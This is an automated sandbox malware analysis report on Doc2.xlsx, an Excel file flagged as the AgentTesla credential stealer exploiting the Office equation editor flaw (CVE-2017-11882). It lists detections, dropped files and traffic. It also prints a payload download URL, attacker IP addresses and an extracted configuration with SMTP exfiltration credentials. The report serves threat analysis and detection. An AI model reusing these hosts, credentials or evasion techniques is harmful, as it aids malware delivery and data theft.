Windows Analysis Report Doc2.xlsx

Overview

General Information

Sample Name: Doc2.xlsx
Analysis ID: 452692
MD5: 7848697a2cff990710c69e8d97e55c13
SHA1: 9af272f7dedd808c48b03d98d7eb75356b74f6ee
SHA256: ef17f47bcdb067d712661ddadff8ebee2924282c7fe21edd237e8094cc4ebdb0
Tags: VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large strings
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://arkemagrup.com/Doc_87654334567.exe Avira URL Cloud: Label: malware
Found malware configuration
Source: 11.2.MLdAu.exe.30ee310.3.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "account@jiqdyi.com", "Password": "Emotion22", "Host": "mail.spamora.net"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Doc_87654334567[1].exe ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Roaming\WzyRXCWtdGSdEA.exe ReversingLabs: Detection: 13%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 13%
Multi AV Scanner detection for submitted file
Source: Doc2.xlsx ReversingLabs: Detection: 28%

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: .pDBl source: vbc.exe, 00000006.00000002.2229803981.0000000002311000.00000004.00000001.sdmp, vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp, MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: arkemagrup.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 185.26.106.165:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 185.26.106.165:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 68MB

Networking:

barindex
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 185.26.106.194:587
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.26.106.194 185.26.106.194
Source: Joe Sandbox View IP Address: 185.26.106.165 185.26.106.165
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ATE-ASFR ATE-ASFR
Source: Joe Sandbox View ASN Name: ATE-ASFR ATE-ASFR
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 185.26.106.194:587
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /Doc_87654334567.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: arkemagrup.comConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\38D6D8CE.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /Doc_87654334567.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: arkemagrup.comConnection: Keep-Alive
Source: vbc.exe, 00000009.00000002.2370250103.000000000093D000.00000004.00000020.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: arkemagrup.com
Source: vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp String found in binary or memory: http://BGwprh.com
Source: vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: vbc.exe, 00000009.00000002.2370250103.000000000093D000.00000004.00000020.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: vbc.exe, 00000009.00000002.2370250103.000000000093D000.00000004.00000020.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: vbc.exe, 00000009.00000002.2370164417.00000000008CD000.00000004.00000020.sdmp, vbc.exe, 00000009.00000003.2293255125.0000000006170000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmp String found in binary or memory: http://mail.spamora.net
Source: vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: vbc.exe, 00000009.00000002.2370250103.000000000093D000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: vbc.exe, 00000009.00000002.2370250103.000000000093D000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: vbc.exe, 00000009.00000002.2370250103.000000000093D000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.sectigo.com0%
Source: vbc.exe, 00000006.00000002.2235845813.000000000B8F0000.00000002.00000001.sdmp, vbc.exe, 00000009.00000002.2375831529.0000000005CD0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000006.00000002.2229803981.0000000002311000.00000004.00000001.sdmp, MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000009.00000002.2382948268.0000000008610000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: vbc.exe, 00000006.00000002.2235845813.000000000B8F0000.00000002.00000001.sdmp, vbc.exe, 00000009.00000002.2375831529.0000000005CD0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp String found in binary or memory: https://login.blockchain.com/HD?m
Source: vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp String found in binary or memory: https://login.blockchain.com/ObjectLengthChainingModeGCMAuthTagLengthChainingModeKeyDataBlobAESMicro
Source: vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: vbc.exe, 00000006.00000002.2230917923.00000000034B9000.00000004.00000001.sdmp, vbc.exe, 00000009.00000002.2369735651.0000000000402000.00000040.00000001.sdmp, MLdAu.exe, 0000000B.00000002.2342137023.0000000002FF1000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a window with clipboard capturing capabilities
Source: C:\Users\Public\vbc.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

System Summary:

barindex
.NET source code contains very large strings
Source: vbc.exe.4.dr, Utilities/UI.Controls/Design/YaTabControlDesigner.cs Long String: Length: 32771
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Doc_87654334567[1].exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Memory allocated: 76D20000 page execute and read and write
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 6_2_00318C20 6_2_00318C20
Source: C:\Users\Public\vbc.exe Code function: 6_2_00311068 6_2_00311068
Source: C:\Users\Public\vbc.exe Code function: 6_2_003178A9 6_2_003178A9
Source: C:\Users\Public\vbc.exe Code function: 6_2_0031D488 6_2_0031D488
Source: C:\Users\Public\vbc.exe Code function: 6_2_0031AD50 6_2_0031AD50
Source: C:\Users\Public\vbc.exe Code function: 6_2_003171E8 6_2_003171E8
Source: C:\Users\Public\vbc.exe Code function: 6_2_00319DE8 6_2_00319DE8
Source: C:\Users\Public\vbc.exe Code function: 6_2_00319391 6_2_00319391
Source: C:\Users\Public\vbc.exe Code function: 6_2_0031BC18 6_2_0031BC18
Source: C:\Users\Public\vbc.exe Code function: 6_2_0031BC08 6_2_0031BC08
Source: C:\Users\Public\vbc.exe Code function: 6_2_0031AC5F 6_2_0031AC5F
Source: C:\Users\Public\vbc.exe Code function: 6_2_0031D040 6_2_0031D040
Source: C:\Users\Public\vbc.exe Code function: 6_2_00318088 6_2_00318088
Source: C:\Users\Public\vbc.exe Code function: 6_2_0031CDE8 6_2_0031CDE8
Source: C:\Users\Public\vbc.exe Code function: 6_2_0031EE28 6_2_0031EE28
Source: C:\Users\Public\vbc.exe Code function: 6_2_0031EE18 6_2_0031EE18
Source: C:\Users\Public\vbc.exe Code function: 6_2_0031F2B1 6_2_0031F2B1
Source: C:\Users\Public\vbc.exe Code function: 6_2_0031D2A0 6_2_0031D2A0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0031F2C0 6_2_0031F2C0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0031DFB4 6_2_0031DFB4
Source: C:\Users\Public\vbc.exe Code function: 6_2_0031C790 6_2_0031C790
Source: C:\Users\Public\vbc.exe Code function: 6_2_00318B80 6_2_00318B80
Source: C:\Users\Public\vbc.exe Code function: 6_2_0031FB88 6_2_0031FB88
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B2168 6_2_003B2168
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B1758 6_2_003B1758
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B0638 6_2_003B0638
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B1A08 6_2_003B1A08
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B0048 6_2_003B0048
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B0040 6_2_003B0040
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B2159 6_2_003B2159
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B2558 6_2_003B2558
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B1749 6_2_003B1749
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B2549 6_2_003B2549
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B37A9 6_2_003B37A9
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B35A0 6_2_003B35A0
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B05F9 6_2_003B05F9
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B19F8 6_2_003B19F8
Source: C:\Users\Public\vbc.exe Code function: 6_2_003B31F4 6_2_003B31F4
Source: C:\Users\Public\vbc.exe Code function: 9_2_00325928 9_2_00325928
Source: C:\Users\Public\vbc.exe Code function: 9_2_00325C70 9_2_00325C70
Source: C:\Users\Public\vbc.exe Code function: 9_2_00326540 9_2_00326540
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_002E8C20 11_2_002E8C20
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_002E78A9 11_2_002E78A9
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_002E00B0 11_2_002E00B0
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_002ED488 11_2_002ED488
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_002E71E8 11_2_002E71E8
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_002E9DE8 11_2_002E9DE8
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_002EB361 11_2_002EB361
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_002E9391 11_2_002E9391
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_002EBC08 11_2_002EBC08
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_002E8C1B 11_2_002E8C1B
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_002EBC18 11_2_002EBC18
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_002ED040 11_2_002ED040
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_002E8088 11_2_002E8088
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_002E08E8 11_2_002E08E8
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_002EE4CC 11_2_002EE4CC
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_002ECDE8 11_2_002ECDE8
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_002EEE28 11_2_002EEE28
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_002EEE18 11_2_002EEE18
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_002ED2A0 11_2_002ED2A0
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_002EF2B1 11_2_002EF2B1
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_002EF2C0 11_2_002EF2C0
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_002EC790 11_2_002EC790
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_01D21758 11_2_01D21758
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_01D220E0 11_2_01D220E0
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_01D22E38 11_2_01D22E38
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_01D219F8 11_2_01D219F8
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_01D205F9 11_2_01D205F9
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_01D22B51 11_2_01D22B51
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_01D23518 11_2_01D23518
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_01D23721 11_2_01D23721
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_01D224D0 11_2_01D224D0
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_01D224C0 11_2_01D224C0
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_01D20048 11_2_01D20048
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_01D21A08 11_2_01D21A08
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_01D20638 11_2_01D20638
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_001D2E38 12_2_001D2E38
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_001D5892 12_2_001D5892
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_001D20E0 12_2_001D20E0
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_001D1758 12_2_001D1758
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_001D1A08 12_2_001D1A08
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_001D0006 12_2_001D0006
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_001D0638 12_2_001D0638
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_001D0048 12_2_001D0048
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_001D20D1 12_2_001D20D1
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_001D24D0 12_2_001D24D0
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_001D24C0 12_2_001D24C0
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_001D3518 12_2_001D3518
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_001D3721 12_2_001D3721
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_001D1749 12_2_001D1749
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_001D316C 12_2_001D316C
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_001D59DA 12_2_001D59DA
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_001D05F9 12_2_001D05F9
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_001D19F8 12_2_001D19F8
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_00278C20 12_2_00278C20
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_002778A9 12_2_002778A9
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_002700B0 12_2_002700B0
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_0027D488 12_2_0027D488
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_0027AD50 12_2_0027AD50
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_002771E8 12_2_002771E8
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_00279DE8 12_2_00279DE8
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_00279391 12_2_00279391
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_0027BC08 12_2_0027BC08
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_0027BC18 12_2_0027BC18
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_0027AC77 12_2_0027AC77
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_0027D040 12_2_0027D040
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_002798A8 12_2_002798A8
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_00278088 12_2_00278088
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_002708F4 12_2_002708F4
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_0027AD40 12_2_0027AD40
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_002771E0 12_2_002771E0
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_0027CDE8 12_2_0027CDE8
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_0027EE28 12_2_0027EE28
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_0027EE18 12_2_0027EE18
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_0027D2A0 12_2_0027D2A0
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_0027F2B1 12_2_0027F2B1
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_0027F2C0 12_2_0027F2C0
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_00271768 12_2_00271768
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_00278B80 12_2_00278B80
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_0027C790 12_2_0027C790
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 17_2_00235928 17_2_00235928
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 17_2_00236540 17_2_00236540
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 17_2_00235C70 17_2_00235C70
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: Doc2.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Doc_87654334567[1].exe 3441D4122B712A32E1C0518F02903A632ECBF557FBAB71C510C732474D326CD1
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe 3441D4122B712A32E1C0518F02903A632ECBF557FBAB71C510C732474D326CD1
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\WzyRXCWtdGSdEA.exe 3441D4122B712A32E1C0518F02903A632ECBF557FBAB71C510C732474D326CD1
Source: Doc_87654334567[1].exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@18/28@7/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Doc2.xlsx Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Mutant created: \Sessions\1\BaseNamedObjects\bCmLOidXVAcpgGmAXeH
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVREE54.tmp Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ................`.$...............$.....(.P.....h.......p....................................................................................... Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ....................d...........E.R.R.O.R.:. ...................................................................(............................... Jump to behavior
